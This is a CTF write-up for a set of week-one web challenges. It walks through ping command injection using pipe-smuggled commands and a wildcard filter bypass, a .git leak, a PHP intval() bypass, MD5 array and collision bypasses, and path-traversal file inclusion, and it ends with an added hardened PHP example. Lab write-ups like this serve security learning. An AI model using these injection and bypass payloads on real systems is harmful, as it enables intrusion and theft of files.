?ctf writeup

week1

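Front-end mini game

The usual approach: for a mini-game challenge, look for game.js.

It contains a base64 string; decoding it gives the flag.

ping

A ping page, so the usual approach applies.

Append | after 127.0.0.1, followed by a command.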

127.0.01|ls

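flag.txt is right there in the current directory; the 1.txt in the listing is the file I created to display the flag.

After some fuzzing I found that the string flag is filtered, so I replaced part of it with wildcards.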

127.0.0.1|nl fl??.* >1.txt

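Visiting 1.txt then shows the flag.

Gitttttttt

The challenge hint mentions the /.git folder; there are ready-made tools for this on GitHub.

GitHack handles it directly.

from_http

HTTP requests: modify the request layer by layer as each response asks.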

secret of php

<?php
highlight_file(__FILE__);
include("flag.php");
$a = $_GET['a'];

if (isset($a)){
    if($a === "2025") {
        die("no");
    } else {
        echo "<br>"."yes"."<br>";
    }
    if(intval($a,0) === 2025) {
        echo "yes yes"."<br>";
        echo "Congratulations! You have passed the first level, the next level is ".$path."<br>";
    } else {
        die("no no");
    }
} else {
    echo "a is not set"."<br>";
}

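Passing ?a=2025. (with the trailing dot) works: the string is not identical to "2025", but intval() still parses it as 2025. The response says the next level is at /Flll4g.php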

<?php
highlight_file(__FILE__);
include('flag.php');
$a = $_POST['a'];
$b = $_POST['b'];

if (isset($a) && isset($b)){
    if ($a !== $b && md5($a) == md5($b)){
        echo "<br>yes<br>";
    } else {
        die("no");
    }
    $a = $_REQUEST['aa'];
    $b = $_REQUEST['bb'];
    if ($a !== $b && md5((string)$a) === md5((string)$b)){
        echo "yes yes<br>";
    } else {
        die("no no");
    }
    $a = $_REQUEST['aaa'];
    $b = $_REQUEST['bbb'];
    if ((string)$a !== (string)$b && md5((string)$a) === md5((string)$b)){
        echo "yes yes yes<br>";
        echo "Congratulations! You have passed the second level, the flag is ".$flag."<br>";
    } else {
        die("no no no");
    }
} else {
    echo "a or b is not set<br>";
}

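The a/b and aa/bb checks fall at a glance to the MD5 array bypass. aaa and bbb do not, because an array cast to a string becomes Array.

Here a pair of MD5-colliding strings can be used: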

aaa=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&bbb=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
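
Both levels fall because intval() and md5() are applied to loosely validated request input. As an added example (not part of the challenge source or of this write-up's solution), a hardened form of the same checks for PHP 8; the helper names parse_int_strict and same_digest are hypothetical and the sample inputs are constructed:

```php
<?php
declare(strict_types=1);

// Added example: hardened counterparts of the level 1 and level 2 checks.
// parse_int_strict() and same_digest() are hypothetical helper names.

/** Accept only a canonical decimal string, so "2025." or "0x7e9" is rejected. */
function parse_int_strict(mixed $v): ?int
{
    if (!is_string($v) || preg_match('/\A(0|[1-9][0-9]{0,8})\z/', $v) !== 1) {
        return null;
    }
    return (int) $v;
}

/** Digest equality on strings only, with SHA-256 instead of MD5. */
function same_digest(mixed $a, mixed $b): bool
{
    if (!is_string($a) || !is_string($b)) {
        return false; // arrays from a[]=... never reach the hash function
    }
    // hash_equals() compares the full digests in constant time, with no type juggling
    return hash_equals(hash('sha256', $a), hash('sha256', $b));
}

// Constructed inputs shaped like the requests in the write-up.
$level1 = '2025.';   // ?a=2025.
$aa = ['1'];         // aa[]=1
$bb = ['2'];         // bb[]=2

// Challenge logic for level 1: the string differs from "2025" but intval() still parses 2025.
var_dump($level1 !== '2025' && intval($level1, 0) === 2025);
// Hardened: the trailing dot makes the value non-canonical, so it is refused.
var_dump(parse_int_strict($level1));
var_dump(parse_int_strict('2025'));

// Hardened level 2: non-string parameters are refused before hashing.
var_dump(same_digest($aa, $bb));
// Different strings match only on a SHA-256 collision; an MD5 collision pair does not qualify.
var_dump(same_digest('abc', 'abd'));
```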

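Food containing unknown ingredients?!

File inclusion via include.

The source code hints that the flag is in flag.txt.

Passing it directly as the parameter returned nothing. Thinking back to challenges I had done before, I wondered whether it was directory traversal.

I tried it, and the vulnerability is there.

Switching the target to flag.txt gives the flag.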